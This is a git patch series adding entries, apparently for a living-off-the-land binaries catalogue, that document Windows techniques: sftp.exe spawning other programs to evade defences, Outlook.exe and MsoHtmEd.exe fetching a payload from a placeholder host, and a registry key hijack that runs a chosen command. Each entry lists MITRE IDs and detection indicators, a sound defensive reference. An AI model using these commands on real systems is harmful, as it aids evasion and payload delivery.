From 860246fe1816001b186ab4f5e0347b81918ffd3c Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Sun, 6 Nov 2022 20:19:45 +0700
Subject: [PATCH 1/7] Add sftp.exe executor

c:\windows\system32\openssh\sftp.exe with the -D flag, is able to execute another exe file
---
 yml/OSBinaries/sftp | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 yml/OSBinaries/sftp

diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp
new file mode 100644
index 00000000..114b9f3e
--- /dev/null
+++ b/yml/OSBinaries/sftp
@@ -0,0 +1,20 @@
+---
+Name: sftp.exe
+Description: SSH File Transfer Protocol
+Author: Nir Chako
+Created: 2022-11-06
+Commands:
+  - Command: "sftp -D c:\windows\system32\notepad.exe"
+    Description: Execute notepad.exe with sftp.exe as parent process
+    Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: c:\windows\system32\OpenSSH\sftp.exe
+Detection:
+  - IOC: sftp.exe spawning unexpected processes
+Acknowledgement:
+  - Person: 'Nir Chako (Pentera)'
+    Handle: '@C_h4ck_0'

From da86328865090c6ee802789a4117b0e46ae93ad2 Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Sun, 6 Nov 2022 20:26:13 +0700
Subject: [PATCH 2/7] Rename sftp to sftp.yml

---
 yml/OSBinaries/{sftp => sftp.yml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename yml/OSBinaries/{sftp => sftp.yml} (100%)

diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp.yml
similarity index 100%
rename from yml/OSBinaries/sftp
rename to yml/OSBinaries/sftp.yml

From 8fafb0217113ce1e09068da26198c8da04c9686e Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Sun, 6 Nov 2022 20:31:24 +0700
Subject: [PATCH 3/7] fix yaml-lint syntax error

---
 yml/OSBinaries/sftp.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml
index 114b9f3e..22396c96 100644
--- a/yml/OSBinaries/sftp.yml
+++ b/yml/OSBinaries/sftp.yml
@@ -4,7 +4,7 @@ Description: SSH File Transfer Protocol
 Author: Nir Chako
 Created: 2022-11-06
 Commands:
-  - Command: "sftp -D c:\windows\system32\notepad.exe"
+  - Command: "sftp -D c:\\windows\\system32\\notepad.exe"
     Description: Execute notepad.exe with sftp.exe as parent process
     Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
     Category: Execute

From 0c0e242481037c01ee35504d451b777006338516 Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Tue, 8 Nov 2022 21:53:10 +0700
Subject: [PATCH 4/7] Add Outlook.exe downloader

---
 yml/OtherMSBinaries/Outlook.yml | 34 +++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Outlook.yml

diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml
new file mode 100644
index 00000000..a7efcf35
--- /dev/null
+++ b/yml/OtherMSBinaries/Outlook.yml
@@ -0,0 +1,34 @@
+---
+Name: Outlook.exe
+Description: Microsoft Office component
+Author: Nir Chako
+Created: 2022-11-08
+Commands:
+  - Command: Outlook.exe https://example.com/payload
+    Description: Downloads payload from remote server
+    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+Detection:
+  - IOC: Suspicious Office application internet/network traffic
+Acknowledgement:
+  - Person: Nir Chako (Pentera)
+    Handle: '@C_h4ck_0'

From e803bc7635ebd4bebac4d30e806937fc58151910 Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Mon, 14 Nov 2022 13:45:59 +0700
Subject: [PATCH 5/7] Update sftp.yml

* Added another way of using sftp for execution
* Added Download functionality
---
 yml/OSBinaries/sftp.yml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml
index 22396c96..7159022b 100644
--- a/yml/OSBinaries/sftp.yml
+++ b/yml/OSBinaries/sftp.yml
@@ -11,10 +11,25 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+  - Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost"
+    Description: Execute notepad.exe with sftp.exe as parent process
+    Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
+  - Command: "sftp <ftp_user>@<ftp_Server_ip>:<path_of_file_to_download> <path_to_save_file>"
+    Description: Download file with sftp.exe from an FTP server
+    Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session.
+    Category: Download
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
 Full_Path:
   - Path: c:\windows\system32\OpenSSH\sftp.exe
 Detection:
   - IOC: sftp.exe spawning unexpected processes
+  - IOC: Suspicious sFTP internet/network traffic
 Acknowledgement:
   - Person: 'Nir Chako (Pentera)'
     Handle: '@C_h4ck_0'

From 9dba4379d49499f7f60b8286458bf9e814bae7c6 Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Sun, 7 May 2023 14:25:29 +0700
Subject: [PATCH 6/7] Update MsoHtmEd.yml

---
 yml/OtherMSBinaries/MsoHtmEd.yml | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml
index fb2ac30b..74dad517 100644
--- a/yml/OtherMSBinaries/MsoHtmEd.yml
+++ b/yml/OtherMSBinaries/MsoHtmEd.yml
@@ -4,6 +4,13 @@ Description: Microsoft Office component
 Author: Nir Chako
 Created: 2022-07-24
 Commands:
+  - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
+    Description: Execute a command line from the registry
+    Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10, Windows 11
   - Command: MsoHtmEd.exe https://example.com/payload
     Description: Downloads payload from remote server
     Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

From 7cdc9263fb198c884115864c74b71dd65c9ac064 Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Sun, 7 May 2023 14:26:12 +0700
Subject: [PATCH 7/7] Update MsoHtmEd.yml

---
 yml/OtherMSBinaries/MsoHtmEd.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml
index 74dad517..6f2fdd0c 100644
--- a/yml/OtherMSBinaries/MsoHtmEd.yml
+++ b/yml/OtherMSBinaries/MsoHtmEd.yml
@@ -6,7 +6,7 @@ Created: 2022-07-24
 Commands:
   - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
     Description: Execute a command line from the registry
-    Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
+    Usecase: Set this registry key with the desired commaned you want to trigger (this example executes calc.exe) - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
     Category: Execute
     Privileges: User
     MitreID: T1218